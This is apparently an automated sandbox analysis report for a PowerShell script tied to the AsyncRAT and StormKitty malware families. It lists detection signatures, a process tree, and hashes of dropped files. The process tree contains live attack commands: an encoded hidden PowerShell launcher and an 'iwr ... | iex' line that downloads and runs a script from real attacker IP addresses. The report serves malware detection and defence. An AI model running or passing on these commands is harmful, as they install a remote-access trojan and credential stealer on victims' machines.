Analysis

  • max time kernel
    95s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-01-2025 18:13

General

  • Target

    2 ps1.ps1

  • Size

    164B

  • MD5

    005b395fecc3e18d5bc9acb93bf96a4f

  • SHA1

    34db5ff90015817fe8b2fe56ca241d6965ae95d4

  • SHA256

    5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0

  • SHA512

    199d54c7cda83e493e611da4f063baec08cbc6606f8fcedce13dc2413d67133ab26d68045981006db2eb3b996513cac09654867eb3cf00eaaac0a947934e6ff8

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\2 ps1.ps1"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3408
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4684
        • C:\Windows\Temp\Package.exe
          C:\Windows\Temp\Package.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3048
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4536
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1928
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\auibcdct\auibcdct.cmdline"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:512
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC803.tmp" "c:\Users\Admin\AppData\Local\Temp\auibcdct\CSC8E5B6C98AD694F06A9A968F3D1F62311.TMP"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1628
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                7⤵
                  PID:1852
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  7⤵
                    PID:1660
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:1892
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 212
                5⤵
                • Program crash
                PID:1328
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3048 -ip 3048
        1⤵
          PID:3852

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          556084f2c6d459c116a69d6fedcc4105

          SHA1

          633e89b9a1e77942d822d14de6708430a3944dbc

          SHA256

          88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

          SHA512

          0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          50a8221b93fbd2628ac460dd408a9fc1

          SHA1

          7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

          SHA256

          46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

          SHA512

          27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

        • C:\Users\Admin\AppData\Local\Temp\RESC803.tmp

          Filesize

          1KB

          MD5

          dd6ac972c02b60474add9992e6361d7e

          SHA1

          26a959e68f4fbe32dbcfb715db359b8a6c230592

          SHA256

          c8f0b7bc998cbda3141910523b9add89b2e38b6749a546d9b90cc9b234570a0b

          SHA512

          c5014a57fd26df29422a87b927e0708218a416b512603437c92ec008609289a1f31bdedac2b4b38c6836022ad94e985d05c11d319a9b650f166fb8d02654a2c8

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vpbwwx1n.1cd.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\auibcdct\auibcdct.dll

          Filesize

          9KB

          MD5

          a909239057ffff655d44e5ee6117fc55

          SHA1

          1c43803068224d44b0b282865a448baf461c4565

          SHA256

          9394f7283718823211a15b1c43bf839cdc8280ff61c2386ddc95b24492954383

          SHA512

          b526ac0f267d921a4ef3c1ab6150afa3949270c4cefd6ff9f55f6aad393c316cf167ddead3a9a23beada60a1624efc89ae2f3e5dfefdc67968942c14a7e3d221

        • C:\Windows\Temp\Package.exe

          Filesize

          201KB

          MD5

          2696d944ffbef69510b0c826446fd748

          SHA1

          e4106861076981799719876019fe5224eac2655c

          SHA256

          a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

          SHA512

          c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

        • C:\Windows\Temp\iviewers.dll

          Filesize

          88KB

          MD5

          33ae2b9c3e710254fe2e2ce35ff8a7c8

          SHA1

          109e32187254b27e04ef18bbe1b48fad42bca841

          SHA256

          9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68

          SHA512

          2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599

        • \??\c:\Users\Admin\AppData\Local\Temp\auibcdct\CSC8E5B6C98AD694F06A9A968F3D1F62311.TMP

          Filesize

          652B

          MD5

          7d8f41167c31fb01c469980f1bdbc718

          SHA1

          1386f1b74a64a64ef18ffef69943d9360d98e932

          SHA256

          6ae9fd4a3ba52b71a7d61eddd0f9660ab7a0cf0728634b17ee3f8c855f745651

          SHA512

          e6d9db57f3987fffd9691bc4898f11f1378b964bfef1ef144629e548cd7dfd96eb93bf0d1c71362fb8588dc05e9a441252cddb1aea7f9c48c20a5b5041f38384

        • \??\c:\Users\Admin\AppData\Local\Temp\auibcdct\auibcdct.0.cs

          Filesize

          10KB

          MD5

          3fa79decff8805745cea8116d9bb2643

          SHA1

          92343c5fa2c768b964ae3a4e9136e5d7193e8558

          SHA256

          e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c

          SHA512

          5c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78

        • \??\c:\Users\Admin\AppData\Local\Temp\auibcdct\auibcdct.cmdline

          Filesize

          204B

          MD5

          081b86672ebd471f37cea56452f00457

          SHA1

          ed77a18ed1ea2e43aec7423aff82be61fcc54645

          SHA256

          863e2e82d4c4bca5a7fd770b0d572d7bcfc0ceefa5fd78c9187e4010548965cb

          SHA512

          82ea3273c995b33162351ddd25ac3c31df3a7a5dd92920f45b915af697a90801148111b787164032567784abb9d96442d6b71002dfe096ac273f022ae103186d

        • memory/1892-83-0x0000000006DE0000-0x0000000007134000-memory.dmp

          Filesize

          3.3MB

        • memory/1892-77-0x0000000005BD0000-0x0000000006174000-memory.dmp

          Filesize

          5.6MB

        • memory/1892-74-0x0000000000400000-0x0000000000704000-memory.dmp

          Filesize

          3.0MB

        • memory/1892-78-0x0000000005A30000-0x0000000005AC2000-memory.dmp

          Filesize

          584KB

        • memory/1892-79-0x0000000005BC0000-0x0000000005BCA000-memory.dmp

          Filesize

          40KB

        • memory/1892-82-0x0000000006950000-0x00000000069EC000-memory.dmp

          Filesize

          624KB

        • memory/1892-84-0x0000000007960000-0x00000000079D6000-memory.dmp

          Filesize

          472KB

        • memory/1892-85-0x0000000007A10000-0x0000000007A2E000-memory.dmp

          Filesize

          120KB

        • memory/1928-43-0x00000000050A0000-0x0000000005106000-memory.dmp

          Filesize

          408KB

        • memory/1928-39-0x0000000002850000-0x0000000002886000-memory.dmp

          Filesize

          216KB

        • memory/1928-55-0x0000000005E20000-0x0000000005E3E000-memory.dmp

          Filesize

          120KB

        • memory/1928-56-0x0000000005EB0000-0x0000000005EFC000-memory.dmp

          Filesize

          304KB

        • memory/1928-57-0x0000000007480000-0x0000000007AFA000-memory.dmp

          Filesize

          6.5MB

        • memory/1928-58-0x0000000006300000-0x000000000631A000-memory.dmp

          Filesize

          104KB

        • memory/1928-59-0x0000000007410000-0x000000000741E000-memory.dmp

          Filesize

          56KB

        • memory/1928-72-0x0000000007420000-0x0000000007428000-memory.dmp

          Filesize

          32KB

        • memory/1928-42-0x0000000004F00000-0x0000000004F66000-memory.dmp

          Filesize

          408KB

        • memory/1928-41-0x0000000004E60000-0x0000000004E82000-memory.dmp

          Filesize

          136KB

        • memory/1928-40-0x0000000005200000-0x0000000005828000-memory.dmp

          Filesize

          6.2MB

        • memory/1928-50-0x0000000005930000-0x0000000005C84000-memory.dmp

          Filesize

          3.3MB

        • memory/2404-0-0x00007FFFC1E73000-0x00007FFFC1E75000-memory.dmp

          Filesize

          8KB

        • memory/2404-36-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

          Filesize

          10.8MB

        • memory/2404-12-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

          Filesize

          10.8MB

        • memory/2404-11-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

          Filesize

          10.8MB

        • memory/2404-6-0x000001B6A9800000-0x000001B6A9822000-memory.dmp

          Filesize

          136KB

        • memory/3408-32-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

          Filesize

          10.8MB

        • memory/3408-24-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

          Filesize

          10.8MB

        • memory/3408-23-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

          Filesize

          10.8MB

        • memory/3408-22-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

          Filesize

          10.8MB